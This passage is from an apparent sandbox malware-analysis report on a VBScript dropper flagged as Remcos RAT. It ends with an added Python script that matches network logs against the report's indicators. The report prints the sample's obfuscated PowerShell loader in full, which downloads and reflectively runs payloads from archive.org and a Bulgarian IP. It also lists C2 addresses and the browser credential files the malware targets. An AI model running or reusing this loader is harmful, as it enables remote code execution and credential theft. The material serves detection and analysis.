                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('fii'+'url = 9uohttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/deta'+'hn'+'ot'+'ev.txt9uo;'+'fi'+'i'+'base'+'64c'+'on'+'t'+'en'+'t'+' '+'= (new-object system.n'+'e'+'t'+'.web'+'c'+'li'+'ent).d'+'ow'+'nl'+'oad'+'string(f'+'i'+'i'+'ur'+'l)'+';fiib'+'inarycon'+'te'+'nt'+' '+'= [system'+'.'+'convert]::fromba'+'se64'+'st'+'rin'+'g'+'(f'+'iibas'+'e'+'64conte'+'nt);fiias'+'sem'+'bly = '+'[refle'+'ct'+'ion.assembly]::lo'+'ad(fiibin'+'ar'+'yc'+'ontent);fiity'+'pe = fiiass'+'em'+'bly.get'+'type(9uorunp'+'e.home9u'+'o);fiimethod '+'= f'+'i'+'itype'+'.getmet'+'hod'+'(9uova'+'i9uo);f'+'iime'+'t'+'ho'+'d'+'.'+'invoke'+'(fii'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uotxt.f'+'c'+'cmr/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uo , 9u'+'odesativado9'+'u'+'o'+' , 9uode'+'s'+'a'+'ti'+'vad'+'o9uo , 9uodesativ'+'ado9uo,9uoreg'+'asm9uo,9uo9'+'uo'+'))').replace(([char]70+[char]73+[char]105),[string][char]36).replace(([char]57+[char]117+[char]79),[string][char]39))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('fii'+'url = 9uohttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/deta'+'hn'+'ot'+'ev.txt9uo;'+'fi'+'i'+'base'+'64c'+'on'+'t'+'en'+'t'+' '+'= (new-object system.n'+'e'+'t'+'.web'+'c'+'li'+'ent).d'+'ow'+'nl'+'oad'+'string(f'+'i'+'i'+'ur'+'l)'+';fiib'+'inarycon'+'te'+'nt'+' '+'= [system'+'.'+'convert]::fromba'+'se64'+'st'+'rin'+'g'+'(f'+'iibas'+'e'+'64conte'+'nt);fiias'+'sem'+'bly = '+'[refle'+'ct'+'ion.assembly]::lo'+'ad(fiibin'+'ar'+'yc'+'ontent);fiity'+'pe = fiiass'+'em'+'bly.get'+'type(9uorunp'+'e.home9u'+'o);fiimethod '+'= f'+'i'+'itype'+'.getmet'+'hod'+'(9uova'+'i9uo);f'+'iime'+'t'+'ho'+'d'+'.'+'invoke'+'(fii'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uotxt.f'+'c'+'cmr/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uo , 9u'+'odesativado9'+'u'+'o'+' , 9uode'+'s'+'a'+'ti'+'vad'+'o9uo , 9uodesativ'+'ado9uo,9uoreg'+'asm9uo,9uo9'+'uo'+'))').replace(([char]70+[char]73+[char]105),[string][char]36).replace(([char]57+[char]117+[char]79),[string][char]39))"Jump to behavior
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerH
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerf
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerF
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJA\6
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager;
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerK
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager*
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQ
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager@
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJA\
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434CB6 cpuid 11_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,11_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA,11_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW,11_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 10.2.powershell.exe.26f3e654470.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f45f00000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f3e654470.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f45f00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 11_2_0040BB6B

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                  Source: Yara match | File source: 10.2.powershell.exe.26f3e654470.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f45f00000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f3e654470.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.powershell.exe.26f45f00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 11_2_0040569A
                  MITRE ATT&CK Matrix (techniques listed per tactic; the bracketed numbers are the figures printed next to a technique in the report's matrix)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                  Resource Development: Scripting [221]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                  Execution: Native API [1]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [12]; Service Execution [2]; PowerShell [3]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                  Persistence: Scripting [221]; DLL Side-Loading [1]; Windows Service [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [222]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Defense Evasion: Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Virtualization/Sandbox Evasion [31]; Access Token Manipulation [1]; Process Injection [222]; HTML Smuggling; Dynamic API Resolution
                  Credential Access: OS Credential Dumping [1]; Input Capture [211]; Credentials In Files [2]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                  Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [33]; Security Software Discovery [21]; Virtualization/Sandbox Evasion [31]; Process Discovery [3]; Application Window Discovery [1]; System Owner/User Discovery [1]
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                  Collection: Archive Collected Data [11]; Input Capture [211]; Clipboard Data [3]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                  Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [21]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                  Behavior Graph ID: 1523832 | Sample: 5fKvwnCAeC.vbs | Startdate: 02/10/2024 | Architecture: WINDOWS | Score: 100
                  Start: ia600100.us.archive.org; Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 15 other signatures
                  -> wscript.exe (started): VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
                  -> powershell.exe (started): Suspicious powershell command line found; Obfuscated command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading
                  -> powershell.exe (started) and conhost.exe (started): 45.90.89.123, 49707, 80 CMCSUS Bulgaria; ia600100.us.archive.org 207.241.227.240, 443, 49706 INTERNET-ARCHIVEUS United States; Writes to foreign memory regions; Injects a PE file into a foreign processes
                  -> RegAsm.exe (started): 45.90.89.98, 49708, 49713, 60898 CMCSUS Bulgaria; Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures

                  Source | Detection | Scanner | Label
                  5fKvwnCAeC.vbs | 8% | ReversingLabs | Script.Trojan.Heuristic
                  5fKvwnCAeC.vbs | 10% | Virustotal |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  ia600100.us.archive.org | 0% | Virustotal |
                  Source | Detection | Scanner | Label
                  http://geoplugin.net/json.gp | 0% | URL Reputation | safe
                  http://geoplugin.net/json.gp | 0% | URL Reputation | safe
                  http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                  http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                  http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
                  https://go.micro | 0% | URL Reputation | safe
                  https://contoso.com/ | 0% | URL Reputation | safe
                  https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                  https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                  https://contoso.com/License | 0% | URL Reputation | safe
                  https://contoso.com/Icon | 0% | URL Reputation | safe
                  https://oneget.orgX | 0% | URL Reputation | safe
                  https://oneget.orgX | 0% | URL Reputation | safe
                  https://aka.ms/pscore68 | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                  https://oneget.org | 0% | URL Reputation | safe
                  http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
                  http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
                  https://ia600100.us.archive.org | 1% | Virustotal |
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 10% | Virustotal |
                  http://45.90.89.123/2117/RMCCF.txt | 15% | Virustotal |
                  https://github.com/Pester/Pester | 1% | Virustotal |
                  http://45.90.89.123 | 14% | Virustotal |
                  http://ia600100.us.archive.org | 0% | Virustotal |
                  45.90.89.98 | 12% | Virustotal |
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ia600100.us.archive.org
                  207.241.227.240
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
                  http://45.90.89.123/2117/RMCCF.txttrueunknown
                  45.90.89.98trueunknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | RegAsm.exe | false | URL Reputation: safe (×2) | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
https://go.micro | powershell.exe, 0000000A.00000002.1391003389.0000026F2E87A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (×2) | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (×2) | unknown
https://ia600100.us.arX | powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
https://ia600100.us.archive.org | powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
http://45.90.89.123 | powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1454522210.000001EB02CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1454522210.000001EB02C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Content | powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1454522210.000001EB02CCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
https://oneget.org | powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 0000000A.00000002.1391003389.0000026F2EF0E000.00000004.00000800.00020000.00000000.sdmp | false | none | unknown
Sources ending in .sdmp are process memory dumps. Entries such as https://go.micro, https://oneget.orgX, https://ia600100.us.arX and the DetahNoteV.txt entry with a trailing "9uO;FIibase64Content" are strings carved from those dumps; the cut-off or trailing characters are adjacent memory bytes, not part of a contacted URL.
IP | Domain | Country | ASN | ASN Name | Malicious
45.90.89.123 | unknown | Bulgaria | 33657 | CMCSUS | true
45.90.89.98 | unknown | Bulgaria | 33657 | CMCSUS | true
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
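The URL and IP tables above are this report's network indicators. The following is an added example, not code from the Joe Sandbox report or from Joe Security, that loads those indicators and checks HTTP request and connection records against them. It matches on host plus path rather than on host alone, because the report lists the archive.org-hosted DetahNoteV.txt with Malicious: false while the same host appears in the report's context tables for ten other PureLog/AsyncRAT .vbs samples, so a host-reputation lookup would pass it. The log lines are constructed for the demonstration and their whitespace-separated column layout is an assumption, not any real proxy or Zeek format; the /421/UNOST.txt path is taken from the report's context table for a related sample.

```python
"""Check HTTP request and connection records against this report's IOCs.

Added example; not code from the Joe Sandbox report or from Joe Security.
IOC values are copied from the report's URL, IP and IDS tables. HTTP_LOG and
CONN_LOG are constructed for the demo; their whitespace-separated layout is an
assumption and not any real proxy or Zeek log format.
"""
from urllib.parse import urlsplit

# From the report's URL table. The archive.org entry is listed there with
# "Malicious: false", so host reputation alone would not flag it; matching the
# full host+path does.
IOC_URLS = {
    "http://45.90.89.123/2117/RMCCF.txt",
    "https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt",
}
# From the report's IP table (both marked malicious, AS33657).
IOC_IPS = {"45.90.89.123", "45.90.89.98"}
# C2 endpoint from the report's IDS table (SID 2036594, Remcos JA3 hash, TCP/8243).
IOC_C2_ENDPOINTS = {("45.90.89.98", 8243)}


def url_index(urls):
    """Map (host, path) -> original IOC URL. The scheme is dropped on purpose so
    an http:// retry of an https:// fetch still matches."""
    idx = {}
    for url in urls:
        parts = urlsplit(url)
        idx[(parts.hostname, parts.path or "/")] = url
    return idx


URL_INDEX = url_index(IOC_URLS)


def check_http(host, path):
    """Reason string if a request hits a URL or IP IOC, else None."""
    key = (host.lower(), path)
    if key in URL_INDEX:
        return "url-ioc " + URL_INDEX[key]
    if host in IOC_IPS:
        # Same malicious host, a path the report did not see: still worth an alert.
        return f"ip-ioc {host} path={path}"
    return None


def check_conn(dst_ip, dst_port):
    """Reason string for a connection to the C2 endpoint or a malicious IP."""
    if (dst_ip, dst_port) in IOC_C2_ENDPOINTS:
        return f"c2-endpoint {dst_ip}:{dst_port}"
    if dst_ip in IOC_IPS:
        return f"ip-ioc {dst_ip}"
    return None


# Constructed records: "<ts> <client> <host> <method> <path> <port>".
HTTP_LOG = [
    "2024-10-02T05:29:21 192.168.2.10 ia600100.us.archive.org GET /24/items/detah-note-v/DetahNoteV.txt 443",
    "2024-10-02T05:29:27 192.168.2.10 45.90.89.123 GET /2117/RMCCF.txt 80",
    "2024-10-02T05:29:30 192.168.2.10 geoplugin.net GET /json.gp 80",
    "2024-10-02T05:29:40 192.168.2.10 archive.org GET /details/some-public-item 443",
    "2024-10-02T05:29:45 192.168.2.10 45.90.89.123 GET /421/UNOST.txt 80",
]
# Constructed records: "<ts> <src> <sport> <dst> <dport> <proto>". The second
# line goes to archive.org's IP, which the report marks as not malicious, so it
# must not be flagged on the IP alone.
CONN_LOG = [
    "2024-10-02T05:29:12 192.168.2.10 60901 45.90.89.98 8243 tcp",
    "2024-10-02T05:29:21 192.168.2.10 49706 207.241.227.240 443 tcp",
]


def scan_http(lines):
    """Return (line_no, client, reason) for every HTTP record that hits an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        _ts, client, host, _method, path, _port = line.split()
        reason = check_http(host, path)
        if reason:
            hits.append((n, client, reason))
    return hits
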